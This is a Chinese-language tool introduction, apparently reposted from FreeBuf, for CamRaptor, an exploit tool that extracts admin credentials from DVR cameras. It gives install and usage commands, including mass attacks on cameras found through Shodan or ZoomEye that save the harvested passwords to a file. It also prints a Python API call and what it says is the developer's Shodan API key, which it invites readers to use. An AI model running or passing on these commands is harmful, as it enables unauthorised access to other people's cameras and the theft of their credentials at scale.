CamRaptor是一款針對DVR攝像頭的漏洞利用工具,它可以利用當前主流DVR攝像頭中的多個安全漏洞,幫助廣大研究人員獲取目標DVR網絡攝像頭的管理員憑證。
能夠利用當前主流DVR攝像頭中的多個安全漏洞,例如Novo、CeNova和QSee等。
經過優化處理,支持以多線程的形式同時攻擊列表中的多個目標DVR攝像頭。
簡單的命令行接口和API使用方法。
由于CamRaptor使用Python3開發,因此首先需要在本地設備上安裝并配置好Python3環境。接下來,廣大研究人員可以使用下列命令下載并安裝CamRaptor:
pip3 install git+https://github.com/EntySec/CamRaptor
CamRaptor的使用非常簡單,我們只需要在命令行終端中輸入“camraptor”命令即可使用CamRaptor:
usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] ?????????????????[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES] ? CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials. ? optional arguments: ??-h, --help ???????????顯示這個幫助信息并退出 ??-t, --threads ????????啟用多線程模式以獲得更好的性能 ??-o OUTPUT, --output OUTPUT ????????????????????????將結果存儲至文件 ??-i INPUT, --input INPUT ????????????????????????地址輸入文件 ??-a ADDRESS, --address ADDRESS ????????????????????????提供單個地址 ??--shodan SHODAN ??????通過網絡利用遠程設備所使用的Shodan API密鑰 ??--zoomeye ZOOMEYE ????通過網絡利用遠程設備所使用的ZoomEye API密鑰 ??-p PAGES, --pages PAGES ????????????????????????需要通過ZoomEye獲取的頁面數量
攻擊單個攝像頭
下列命令可以攻擊單個DVR攝像頭:
camraptor -a 192.168.99.100
通過網絡攻擊遠程DVR攝像頭
接下來,我們可以使用Shodan搜索引擎來搜索并攻擊網絡上的攝像頭,此時我們可以使用-t參數來設置多線程數量以獲得更好的性能:
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意:項目中給出的Shodan API密鑰(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是開發人員自己的專業版API密鑰,你可以使用你自己的密鑰,當然了你想用開發人員的也沒意見,大家資源共享嘛!
從輸入文件獲取目標攝像頭
我們還可以使用開放數據庫中提供的攝像頭地址,此時我們可以使用-t參數來設置多線程數量以獲得更好的性能:
camraptor -t -i cameras.txt -o passwords.txt
注意:此命令將會攻擊cameras.txt中給出的所有攝像頭,并會將所有獲取到的密碼存儲至passwords.txt文件中。
CamRaptor還提供了自己的Python API,可以將其導入至你們自己的項目代碼中并調用其功能:
from camraptor import CamRaptor
基礎函數
exploit(address):根據給定的地址針對單個目標執行漏洞利用攻擊;
調用樣例
攻擊單個攝像頭:
from camraptor import CamRaptor camraptor = CamRaptor() creds = camraptor.exploit('192.168.99.100') print(creds)
項目地址
CamRaptor:【GitHub傳送門】
來源:FreeBuf.COM